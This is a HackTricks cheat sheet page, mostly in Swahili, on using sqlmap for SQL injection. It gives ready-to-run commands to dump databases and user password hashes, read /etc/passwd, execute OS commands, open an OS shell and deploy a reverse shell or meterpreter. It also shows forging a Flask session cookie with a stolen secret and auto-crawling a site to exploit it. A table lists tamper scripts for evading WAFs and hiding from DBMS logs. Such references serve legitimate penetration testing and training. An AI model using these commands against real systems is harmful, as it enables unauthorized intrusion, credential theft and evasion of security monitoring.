maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/sql-injection/sqlmap/README.md

218 lines
14 KiB
Markdown
Raw Blame History

# SQLMap - Cheatsheet
{{#include ../../../banners/hacktricks-training.md}}
## Msingi wa hoja za maelekezo kwa SQLmap
### Kawaida
```bash
-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char
```
### Technique flags (`--technique`)
Chaguo la `--technique` linakuruhusu kupunguza au kuagiza upya mbinu za SQL injection ambazo sqlmap itajaribu.
Kila herufi inahusiana na darasa tofauti la payloads:
| Herufi | Mbinu | Maelezo |
| ------ | --------- | ----------- |
| B | Boolean-based blind | Inatumia hali za kweli/false katika jibu la ukurasa ili kudokeza matokeo |
| E | Error-based | Inatumia ujumbe wa makosa ya DBMS wenye maelezo mengi ili kutoa data |
| U | UNION query | Inajumuisha taarifa za `UNION SELECT` ili kupata data kupitia channel ile ile |
| S | Stacked queries | Inajumuisha taarifa za ziada zilizotengwa na delimiter ya SQL (`;`) |
| T | Time-based blind | Inategemea ucheleweshaji wa `SLEEP/WAITFOR` kugundua hali zinazoweza kuingizwa |
| Q | Inline / out-of-band | Inatumia kazi kama `LOAD_FILE()` au exfiltration ya DNS kutoa data |
Agizo la kawaida ambalo sqlmap itafuata ni `BEUSTQ` (mbinu zote).
Unaweza kubadilisha agizo na subset. Kwa mfano, amri ifuatayo itajaribu **tu** mbinu za UNION query na Time-based blind, ikijaribu UNION kwanza:
```bash
sqlmap -u "http://target.tld/page.php?id=1" --technique="UT" --batch
```
### Retrieve Information
#### Internal
```bash
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
--privileges #Get privileges
```
#### Takwimu za DB
```bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
```
Kwa kutumia [SQLMapping](https://taurusomar.github.io/sqlmapping/) ni chombo cha vitendo kinachozalisha amri na kutoa muonekano kamili, wa msingi na wa juu, kwa SQLMap. Inajumuisha ToolTips zinazofafanua kila kipengele cha chombo, zikielezea kila chaguo ili uweze kuboresha na kuelewa jinsi ya kuitumia kwa ufanisi na kwa ufanisi.
## Mahali pa kuingiza
### Kutoka kwa Burp/ZAP kukamata
Kamata ombi na uunde faili ya req.txt
```bash
sqlmap -r req.txt --current-user
```
### Uingizaji wa Ombi la GET
```bash
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
```
### POST Request Injection
```bash
sqlmap -u "http://example.com" --data "username=*&password=*"
```
### Injections katika Vichwa na Mbinu Nyingine za HTTP
```bash
#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"
#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
#The injection is located at the '*'
```
### Onyesha mfuatano wakati sindano inafanikiwa
```bash
--string="string_showed_when_TRUE"
```
### Ongeza mbinu ya kugundua
Ikiwa umepata SQLi lakini sqlmap haikugundua, unaweza kulazimisha mbinu ya kugundua kwa kutumia args kama `--prefix` au `--suffix`, au ikiwa ni ngumu zaidi, kuiongeza kwenye payloads zinazotumiwa na sqlmap katika `/usr/share/sqlmap/data/xml/payloads/time_blind.xml` kwa mfano kwa msingi wa muda kipofu.
### Eval
**Sqlmap** inaruhusu matumizi ya `-e` au `--eval` ili kushughulikia kila payload kabla ya kuisafirisha na python oneliner. Hii inafanya iwe rahisi na haraka kushughulikia kwa njia maalum payload kabla ya kuisafirisha. Katika mfano ufuatao **flask cookie session** **imeandikwa na flask kwa siri inayojulikana kabla ya kuisafirisha**:
```bash
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
```
### Shell
```bash
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
```
### Soma Faili
```bash
--file-read=/etc/passwd
```
### Tembelea tovuti kwa SQLmap na kuji-exploit kiotomatiki
```bash
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
```
### Uingizaji wa Pili
```bash
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
```
[**Soma chapisho hili** ](second-order-injection-sqlmap.md)**kuhusu jinsi ya kufanya sindano za pili rahisi na ngumu na sqlmap.**
## Kubadilisha Sindano
### Weka kiambishi
```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```
### Kichwa cha Kwanza
```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
```
### Msaada wa kutafuta sindano ya boolean
```bash
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
```
### Tamper
Kumbuka kwamba **unaweza kuunda tamper yako mwenyewe katika python** na ni rahisi sana. Unaweza kupata mfano wa tamper katika [Second Order Injection page here](second-order-injection-sqlmap.md).
```bash
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
```
| Tamper | Maelezo |
| ---------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- |
| apostrophemask.py | Hubadilisha herufi ya apostrofi na sawa yake ya UTF-8 yenye upana kamili |
| apostrophenullencode.py | Hubadilisha herufi ya apostrofi na sawa yake isiyo halali ya double unicode |
| appendnullbyte.py | Huongeza herufi ya NULL byte iliyokodishwa mwishoni mwa payload |
| base64encode.py | Hubadilisha herufi zote katika payload iliyotolewa kuwa base64 |
| between.py | Hubadilisha opereta kubwa zaidi ('>') na 'NOT BETWEEN 0 AND #' |
| bluecoat.py | Hubadilisha herufi ya nafasi baada ya taarifa ya SQL na herufi halali ya random. Kisha hubadilisha herufi = na opereta LIKE |
| chardoubleencode.py | Hubadilisha herufi zote kwa njia ya url-encode mara mbili katika payload iliyotolewa (sio kusindika iliyokodishwa tayari) |
| commalesslimit.py | Hubadilisha matukio kama 'LIMIT M, N' na 'LIMIT N OFFSET M' |
| commalessmid.py | Hubadilisha matukio kama 'MID(A, B, C)' na 'MID(A FROM B FOR C)' |
| concat2concatws.py | Hubadilisha matukio kama 'CONCAT(A, B)' na 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' |
| charencode.py | Hubadilisha herufi zote katika payload iliyotolewa kuwa url-encoded (sio kusindika iliyokodishwa tayari) |
| charunicodeencode.py | Hubadilisha herufi zisizokodishwa kuwa unicode-url-encoded katika payload iliyotolewa (sio kusindika iliyokodishwa tayari). "%u0022" |
| charunicodeescape.py | Hubadilisha herufi zisizokodishwa kuwa unicode-url-encoded katika payload iliyotolewa (sio kusindika iliyokodishwa tayari). "\u0022" |
| equaltolike.py | Hubadilisha matukio yote ya opereta sawa ('=') na opereta 'LIKE' |
| escapequotes.py | Huondoa nukta za kukwepa kwenye quotes (' na ") |
| greatest.py | Hubadilisha opereta kubwa zaidi ('>') na sawa yake ya 'GREATEST' |
| halfversionedmorekeywords.py | Huongeza maoni ya MySQL yenye toleo kabla ya kila neno muhimu |
| ifnull2ifisnull.py | Hubadilisha matukio kama 'IFNULL(A, B)' na 'IF(ISNULL(A), B, A)' |
| modsecurityversioned.py | Inajumuisha swali kamili na maoni yenye toleo |
| modsecurityzeroversioned.py | Inajumuisha swali kamili na maoni yasiyo na toleo |
| multiplespaces.py | Huongeza nafasi nyingi kuzunguka maneno muhimu ya SQL |
| nonrecursivereplacement.py | Hubadilisha maneno muhimu ya SQL yaliyowekwa awali na uwakilishi yanayofaa kwa kubadilisha (mfano: .replace("SELECT", "")) filters |
| percentage.py | Huongeza alama ya asilimia ('%') mbele ya kila herufi |
| overlongutf8.py | Hubadilisha herufi zote katika payload iliyotolewa (sio kusindika iliyokodishwa tayari) |
| randomcase.py | Hubadilisha kila herufi ya neno muhimu na thamani ya kesi ya nasibu |
| randomcomments.py | Huongeza maoni ya nasibu kwa maneno muhimu ya SQL |
| securesphere.py | Huongeza mfuatano maalum wa kuundwa |
| sp_password.py | Huongeza 'sp_password' mwishoni mwa payload kwa ajili ya kuficha kiotomatiki kutoka kwa logi za DBMS |
| space2comment.py | Hubadilisha herufi ya nafasi (' ') na maoni |
| space2dash.py | Hubadilisha herufi ya nafasi (' ') na maoni ya dash ('--') ikifuatiwa na mfuatano wa nasibu na mstari mpya ('\n') |
| space2hash.py | Hubadilisha herufi ya nafasi (' ') na herufi ya pound ('#') ikifuatiwa na mfuatano wa nasibu na mstari mpya ('\n') |
| space2morehash.py | Hubadilisha herufi ya nafasi (' ') na herufi ya pound ('#') ikifuatiwa na mfuatano wa nasibu na mstari mpya ('\n') |
| space2mssqlblank.py | Hubadilisha herufi ya nafasi (' ') na herufi ya nafasi ya nasibu kutoka seti halali ya herufi mbadala |
| space2mssqlhash.py | Hubadilisha herufi ya nafasi (' ') na herufi ya pound ('#') ikifuatiwa na mstari mpya ('\n') |
| space2mysqlblank.py | Hubadilisha herufi ya nafasi (' ') na herufi ya nafasi ya nasibu kutoka seti halali ya herufi mbadala |
| space2mysqldash.py | Hubadilisha herufi ya nafasi (' ') na maoni ya dash ('--') ikifuatiwa na mstari mpya ('\n') |
| space2plus.py | Hubadilisha herufi ya nafasi (' ') na plus ('+') |
| space2randomblank.py | Hubadilisha herufi ya nafasi (' ') na herufi ya nafasi ya nasibu kutoka seti halali ya herufi mbadala |
| symboliclogical.py | Hubadilisha opereta za AND na OR na sawa zao za alama (&& na |
| unionalltounion.py | Hubadilisha UNION ALL SELECT na UNION SELECT |
| unmagicquotes.py | Hubadilisha herufi ya nukta (') na mchanganyiko wa byte nyingi %bf%27 pamoja na maoni ya jumla mwishoni (ili kufanya ifanye kazi) |
| uppercase.py | Hubadilisha kila herufi ya neno muhimu kuwa thamani ya herufi kubwa 'INSERT' |
| varnish.py | Huongeza kichwa cha HTTP 'X-originating-IP' |
| versionedkeywords.py | Inajumuisha kila neno muhimu lisilo la kazi na maoni ya MySQL yenye toleo |
| versionedmorekeywords.py | Inajumuisha kila neno muhimu na maoni ya MySQL yenye toleo |
| xforwardedfor.py | Huongeza kichwa cha HTTP bandia 'X-Forwarded-For' |
## Marejeleo
- [SQLMap: Testing SQL Database Vulnerabilities](https://blog.bughunt.com.br/sqlmap-vulnerabilidades-banco-de-dados/)
{{#include ../../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink